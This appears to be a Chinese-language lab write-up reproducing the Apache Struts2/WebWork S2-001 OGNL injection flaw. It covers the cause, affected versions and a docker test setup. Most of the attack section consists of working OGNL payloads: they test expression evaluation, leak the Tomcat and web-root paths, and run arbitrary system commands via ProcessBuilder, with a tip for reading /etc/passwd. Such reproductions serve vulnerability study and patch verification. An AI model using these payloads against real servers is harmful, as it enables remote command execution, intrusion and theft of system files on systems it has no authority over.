S2-001 远程代码执行 漏洞复现

一、漏洞描述

该漏洞因为用户提交表单数据并且验证失败时，后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析，然后重新填充到对应的表单数据中。例如注册或登录页面，提交失败后端一般会默认返回之前提交的数据，由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析，所以可以直接构造 Payload 进行命令执行。

二、漏洞影响

WebWork 2.1 (with altSyntax enabled), WebWork 2.2.0 - WebWork 2.2.5, Struts 2.0.0 - Struts 2.0.8

不受影响的版本：WebWork 2.0, WebWork 2.1 (with altSyntax disabled, which is the default)

三、漏洞复现

1、环境搭建

执行以下命令启动s2-001测试环境：

docker-compose build
docker-compose up -d

访问http://x.x.x.x:8080可查看开启的服务：

2、漏洞复现

对漏洞点进行测试，首先在输入框输入%{1+1}测试是否能执行：

两个输入框都能成功执行：

成功解析证明漏洞存在
尝试获取 Tomcat 执行路径：%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}

获得 Tomcat 执行路径：tomcatBinDir{/usr/local/tomcat}

尝试获取Web路径：
%{ #req=@org.apache.struts2.ServletActionContext@getRequest(), #response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(), #response.println(#req.getRealPath('/')), #response.flush(), #response.close() }

四、漏洞POC

任意命令执行：
%{ #a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(), #b=#a.getInputStream(), #c=new java.io.InputStreamReader(#b), #d=new java.io.BufferedReader(#c), #e=new char[50000], #d.read(#e), #f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"), #f.getWriter().println(new java.lang.String(#e)), #f.getWriter().flush(),#f.getWriter().close() }
替换其中的whoami即可执行命令，若存在空格，则写作：{"cat","/etc/passwd"}形式：

五、参考链接

https://cwiki.apache.org/confluence/display/WW/S2-001